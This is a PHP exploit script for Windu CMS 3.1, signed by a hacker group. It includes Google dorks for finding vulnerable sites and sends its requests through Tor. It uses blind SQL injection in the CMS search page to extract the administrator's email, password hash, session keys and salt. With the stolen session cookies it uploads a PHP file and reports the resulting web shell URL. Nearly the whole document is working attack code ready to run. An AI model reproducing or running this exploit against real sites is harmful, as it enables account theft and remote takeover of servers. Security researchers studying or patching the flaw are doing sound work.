<?php
//Author: Hacker
//WWW: https://devilteam.pl
//twitter: @devilteam
//
//Windu 3.1 => SQL Inj & RCE
//Date: 18.04.2020
//
//Windu CMS to Darmowy Polski system CMS do zarządzania treścią strony internetowej - content management system.
//http://windu.org/
//
//google dork: intextt:"Na silniku: windu.org"
//google dork: intext:"Works on: windu.org"
//
//
// START SETTINGS
//
//Exploit use Tor browser proxy
//Target URL
$url = "http://windu3.1";
//
//http://windu/wyszukiwarka/test <- vulnerable search engine
//String returned by cms when search return existed data
$true_search = "test";
//
//String returned by cms when nothing found in search
$false_search_info = "Nie znaleziono żadnych pasujących materiałów";
//
//RCE
$payload = "<?php phpinfo(); ?>";
//
//
// END SETTINGS
//
//
//-----------------------------
//
//
// START EXPLOIT FLOW
//
//
$admin = getAdmin($url,$true_search,$false_search_info);
$pass = getPass($url,$true_search,$false_search_info);
if(isset($admin) && isset($pass)) {
$login_session = searchAdminloginsession($url,$true_search,$false_search_info,$admin);
$pass_session = searchAdminpasssession($url,$true_search,$false_search_info,$pass);
if(isset($login_session) && isset($pass_session)){
getRCE($url,$login_session,$pass_session,$payload);
//if RCE not works try break password hash abd manual edit page using: {{eval phpinfo()}}
}
// salt needed for break the password hash
getSalt($url,$true_search,$false_search_info);
}
//
//
// END EXPLOIT FLOW
//
//
/* Password hash construction
public function saltPassword($password) {
$passwordPieces = array_reverse(str_split($password));
$saltPieces = str_split(config::get('salt',true));
$counter = 0;
$finalPassword = '';
foreach ($passwordPieces as $piece) {
$finalPassword.=$piece.$saltPieces[$counter];
$counter = $counter+1;
if ($counter>=32)$counter = 0;
}
1
return sha1(sha1(md5(sha1(md5($finalPassword)))));
}
*/
function sendRequest($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9150"); //Tor browser
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
function getAdmin($url, $true_search, $false_search){
//get admin
$j=1;$admin="";
while (!strstr($admin,chr(0))){
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+email+FROM+users+WHERE+superAdministrator=1+limit+0,1),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$admin .= chr($i);
echo "admin -> ".$admin."[???]\r\n";
break;
}
if ($i==255) {$admin.=chr(0);break;echo "Done\n";}
}
$j++;
}
return $admin;
}
function getPass($url, $true_search, $false_search){
//get pass
$j=1;$pass="";
while (!strstr($pass,chr(0))){
if ($j === 41) {
break;
}
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+password+FROM+users+WHERE+superAdministrator=1+limit+0,1),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$pass.=chr($i);
echo "pass -> ".$pass."[???]\r\n";
break;
}
}
$j++;
}
return $pass;
}
function searchAdminloginsession($url, $true_search, $false_search, $email){
$j=1;
$admin="";
$email = substr($email, 0, -1);
$arr = unpack("C*", $email);
$val="";
foreach ($arr as &$value) {
$val .= $value.",";
}
$val = substr($val, 0, -1);
while (!strstr($admin, chr(0))){
if ($j === 33) {
break;
}
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+dataKey+FROM+session+WHERE+data=CHAR(".$val.")),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$admin .= chr($i);
echo "admin login session -> ".$admin."[???]\r\n";
break;
}
if ($i==255) {$admin.=chr(0);break;}
}
$j++;
}
return $admin;
}
function searchAdminpasssession($url, $true_search, $false_search, $passhash){
$j=1;$admin="";
$arr = unpack("C*", $passhash);
$val="";
foreach ($arr as &$value) {
$val .= $value.",";
}
$val = substr($val, 0, -1);
while (!strstr($admin,chr(0))){
if ($j === 33) {
break;
}
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+dataKey+FROM+session+WHERE+data=CHAR(".$val.")),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$admin .= chr($i);
echo "admin pass session -> ".$admin."[???]\r\n";
break;
}
if ($i==255) {$admin.=chr(0);break;}
}
$j++;
}
return $admin;
}
function getSalt($url, $true_search, $false_search){
//get salt
$j=1;$salt="";
while (!strstr($salt,chr(0))){
if ($j === 33) {
break;
}
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+value+FROM+config+WHERE+name=CHAR(115,97,108,116)),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$salt.=chr($i);
echo "salt -> ".$salt."[???]\r\n";
break;
}
if ($i==255) {$salt.=chr(0);break;}
}
$j++;
}
return $salt;
}
function getRCE($url,$login_session,$pass_session,$payload){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url."fileServerJsUpload/main/");
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9150"); //Tor browser
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"-----------------------------32507568294291437482857416325
Content-Disposition: form-data; name=\"files[]\"; filename=\"php.php\"
Content-Type: application/octet-stream
".$payload."
-----------------------------32507568294291437482857416325--");
curl_setopt($ch, CURLOPT_HTTPHEADER,array('Content-Type: multipart/form-data; boundary=---------------------------32507568294291437482857416325','Content-Type: application/octet-stream', 'Cookie: login='.$login_session.'; pass='.$pass_session.';'));
$result=curl_exec ($ch);
$out = json_decode($result, true);
if(isset($out['files'][0]['url'])){
print "!!!PHP SHELL: \n";
print $out['files'][0]['url'];
die();
}
}
?>